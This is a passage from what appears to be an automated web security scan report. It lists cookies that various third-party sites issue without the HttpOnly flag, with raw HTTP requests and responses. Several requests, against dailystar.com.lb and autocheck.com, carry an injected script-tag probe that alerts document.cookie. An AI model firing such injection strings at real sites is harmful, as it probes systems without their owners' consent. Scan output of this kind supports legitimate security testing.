Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 302 Found
Location: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2150004&PluID=0&ord=[timestamp]
Cache-Control: max-age=60
Content-Length: 172

<html><body>You are being <a href="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=20&mc=click&pli=2150004&PluID=0&ord=[timestamp]">redirected</a>.</body></html>

14.579. http://spongecell.com/event_list previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spongecell.com
Path:	/event_list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event_list HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.580. http://spongecell.com/event_page/view/915725 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spongecell.com
Path:	/event_page/view/915725

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_spongecell_loves_u=BAh7CDoJa2V5c1sAOgtsb2NhbGUiCmVuLVVTIgpmbGFzaElDOidBY3Rpb25D%250Ab250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6CW5vdGUwBjoKQHVzZWR7%250ABjsIVA%253D%253D--5f6777943aa1e5d6b4a2cab61b42984a90431a22; domain=.spongecell.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event_page/view/915725 HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7CDoJa2V5c1sAOgtsb2NhbGUiCmVuLVVTIgpmbGFzaElDOidBY3Rpb25D%250Ab250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6CW5vdGUwBjoKQHVzZWR7%250ABjsIVA%253D%253D--5f6777943aa1e5d6b4a2cab61b42984a90431a22; domain=.spongecell.com; path=/
Status: 302 Found
Location: http://spongecell.com/event/view/915725
Cache-Control: no-cache
Content-Length: 105

<html><body>You are being <a href="http://spongecell.com/event/view/915725">redirected</a>.</body></html>

14.581. http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Origin: http://starscene.dailystar.com.lb
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510
Content-Length: 40

ak_action=api_record_view&ids=&type=home

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3
Content-Type: application/json
Content-Length: 39

{"result":false,"ids":"","type":"home"}

14.582. http://stats.dailystar.com.lb/piwik.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.dailystar.com.lb
Path:	/piwik.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

piwik_visitor=2%3DeyI4IjozLCI5IjoiYnVycCIsIjEwIjpmYWxzZSwiNiI6IjExNjcyNzEiLCI3IjoxMjk1OTAzNTAzLCIxIjoiZGU3ODM5NTA5MTdiYTQ1NThjNDA4NzNlYTNlZTFiNWEiLCIyIjoxMjk1OTAzNTAzLCIzIjoxMjk1OTAzNTAzLCI0IjoiMTE2NzI3MSIsIjUiOiIzMTMxNjkiLCIxMSI6MH0%3D%3A_%3D56d7103d07c8fb280920e65bd6d3a9c6aae4566e; expires=Wed, 23-Jan-2013 21:11:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /piwik.php?idsite=2&rec=1&rand=0.49300097208470106&h=15&m=12&s=27&url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&urlref=http%3A%2F%2Fburp%2Fshow%2F35&res=1920x1200&cookie=1&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=1&java=1&gears=1&ag=1&action_name=Nothing%20found%20for%20Music-scenea960d%22%3E%3Cscript%3Ealert(document%20Cookie)%3C%20Script%3Eb7d5247b69c%202010%2011%20Pianist-geoffrey-saba-performs-at-aubs-assembly-hall%20X22 HTTP/1.1
Host: stats.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: piwik_visitor=2%3DeyI4IjozLCI5IjoiYnVycCIsIjEwIjpmYWxzZSwiNiI6IjExNjcyNzEiLCI3IjoxMjk1OTAzNTAzLCIxIjoiZGU3ODM5NTA5MTdiYTQ1NThjNDA4NzNlYTNlZTFiNWEiLCIyIjoxMjk1OTAzNTAzLCIzIjoxMjk1OTAzNTAzLCI0IjoiMTE2NzI3MSIsIjUiOiIzMTMxNjkiLCIxMSI6MH0%3D%3A_%3D56d7103d07c8fb280920e65bd6d3a9c6aae4566e; expires=Wed, 23-Jan-2013 21:11:43 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.583. http://su.addthis.com/red/usync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://su.addthis.com
Path:	/red/usync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; Domain=.addthis.com; Expires=Thu, 24-Jan-2013 01:35:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.584. http://tacoda.at.atwola.com/rtx/r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ANRTT=60848^1^1296494968|62722^1^1296508004; path=/; expires=Mon, 31-Jan-11 21:06:44 GMT; domain=tacoda.at.atwola.com
Tsid=0^1295903204^1295905004|17295^1295903204^1295905004; path=/; expires=Mon, 24-Jan-11 21:36:44 GMT; domain=tacoda.at.atwola.com
TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
N=2:71e5fe306b3f97af479b09e96a0ca00a,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=.at.atwola.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.585. http://tags.bluekai.com/site/10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/10

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.586. http://tags.bluekai.com/site/2981 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2981

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=QbmOT/N77lGsHNJo; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bkc=KJh56q2nQAWROde7lg4u4clJzY7iUu3LU9Gzp1EunRvUs3J4ueIQC9Sh4X9DoWa0qTLS7Og5iC3AF0Oy3iV/GvlaYQngpgFlprKsspfz2lFlzaKl9OqXOwTIDiTOQegNFmjLc6QcbYoxFdUTVcBVXp9G8dGOVoL9E0XJbHWqZdD2t6s9EGM9R0ArdEt9p4vKNd696Eh9dkH8VMwnK2TxXbTvlyuT4X1pgQ7kacw0enFHDYbJKD21lZ4K6d0poqh+XF05WS52GIrvQl6PyffVFO1C6o2ilkKe7XIXjZsqqK0SM6Qwi422fFavewF2YpLXH3xwYm2lqr5zxdM0UOkLF7X6sIlZZEBPfBRAxqbwR/2mRu4Et1rS7UlkZGd4lbqd8Ukoapr+tuA3BXUfErEsoHz+fsOEKj9bDXRIgs9dUYMd98GNMVx=; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bko=KJhE8VPQIwduNoKHRH/q9X1E//rByjLUyZJAAmmeLKT9hqTpZxBjAAYhPc6+/9L9bD6mSx==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwkJFfQL9Y79pPy==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4Uz4aRQKhCTsPQAWNQjWMPNTv3eTYgkySfYyuYeJi5P+ZiIyw5UxrRxY88RL49Wwmq1hz9d63VjQ==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.587. http://titletweets.com/cupbuzz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://titletweets.com
Path:	/cupbuzz

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServercm_web=2221150380.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cupbuzz HTTP/1.1
Host: titletweets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 13:20:50 GMT
Server: Apache/2.2
Location: http://www.titletweets.com/cupbuzz
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServercm_web=2221150380.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.titletweets.
...[SNIP]...

14.588. http://top.net.mk/joomla-verzii/44-joomla-16-dojde previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.net.mk
Path:	/joomla-verzii/44-joomla-16-dojde

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

089e4fa19af2efc7c60bdb03ea3a2cbe=27129c0bc3f4bbc294183027f453203c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla-verzii/44-joomla-16-dojde HTTP/1.1
Host: top.net.mk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.589. http://translate.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.590. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.591. http://translate.googleusercontent.com/translate_c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.googleusercontent.com
Path:	/translate_c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=9c6f01bd6ab51254:TM=1295961657:LM=1295961657:S=NEiSWVoIqCAShc7E; expires=Thu, 24-Jan-2013 13:20:57 GMT; path=/; domain=translate.googleusercontent.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_c HTTP/1.1
Host: translate.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Tue, 25 Jan 2011 13:20:57 GMT
Expires: Tue, 25 Jan 2011 13:20:57 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=9c6f01bd6ab51254:TM=1295961657:LM=1295961657:S=NEiSWVoIqCAShc7E; expires=Thu, 24-Jan-2013 13:20:57 GMT; path=/; domain=translate.googleusercontent.com
X-Content-Type-Options: nosniff
Server: translation
Content-Length: 1350
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>400 Bad Request</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {f
...[SNIP]...

14.592. http://trsrvr.com/x/www/delivery/ck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trsrvr.com
Path:	/x/www/delivery/ck.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

=%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
OAID=09f6a3c0ec377f634dbea24d32d9701c; expires=Wed, 25-Jan-2012 13:21:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x/www/delivery/ck.php HTTP/1.1
Host: trsrvr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:21:00 GMT
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: =%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=09f6a3c0ec377f634dbea24d32d9701c; expires=Wed, 25-Jan-2012 13:21:00 GMT; path=/
Location: http://trsrvr.com/x/www/delivery/ck.php?ct=1&
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

14.593. http://tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=1e736a4ffb2b89d8eb9feef196afe056; expires=Mon, 31-Jan-2011 22:20:52 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tweetmeme.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:52 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; expires=Mon, 31-Jan-2011 22:20:52 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.01006293296814
X-Served-In: 0.074193954467773
X-Served-By: h04
Content-Length: 55778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

14.594. http://ugg.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ugg.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ugg.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.595. http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://venedet.michnica.net
Path:	/index.php/joomla/1-joomla-16-je-tu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

fa5a1b42d3949309610b52593e36fa6f=1841b8d77a50e80e7a37fed80c5175b4; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php/joomla/1-joomla-16-je-tu HTTP/1.1
Host: venedet.michnica.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.596. http://video.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=80bba0dfa9870dce:TM=1295884962:LM=1295884962:S=KNIAhHHGtNDbKn6t; expires=Wed, 23-Jan-2013 16:02:42 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.597. http://video.google.com/videosearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/videosearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=894a182096f23f60:TM=1295964142:LM=1295964142:S=7DudISgZilhHzEc6; expires=Thu, 24-Jan-2013 14:02:22 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videosearch HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.598. http://webtrends.autocheck.com/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webtrends.autocheck.com
Path:	/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WEBTRENDS_ID=173.193.214.243-1295921924.19297; expires=Fri, 22-Jan-2021 02:18:44 GMT; path=/dcs1djgf3c87ozzcdiy9h9817_3i3h

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif?&dcsdat=1295921925437&dcssip=www.autocheck.com&dcsuri=/&dcsqry=%3FWT.mc_id=1824%26siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574&dcsref=http://burp/show/54&WT.co_f=173.193.214.243-1295921924.19297&WT.vtid=173.193.214.243-1295921924.19297&WT.vtvs=1295921925442&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=AutoCheck%20Vehicle%20History%20Reports%20Homepage%20-%20A%20Part%20of%20Experian.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1155x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.autocheck.com/&WT.si_n=FreeVINCK&WT.si_x=1&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: webtrends.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 02:18:44 GMT
Server: Apache/2.2.3 (Red Hat)
Location: /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif?dcsredirect=1&dcsdat=1295921925437&dcssip=www.autocheck.com&dcsuri=/&dcsqry=%3FWT.mc_id=1824%26siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574&dcsref=http://burp/show/54&WT.co_f=173.193.214.243-1295921924.19297&WT.vtid=173.193.214.243-1295921924.19297&WT.vtvs=1295921925442&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=AutoCheck%20Vehicle%20History%20Reports%20Homepage%20-%20A%20Part%20of%20Experian.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1155x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.autocheck.com/&WT.si_n=FreeVINCK&WT.si_x=1&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1
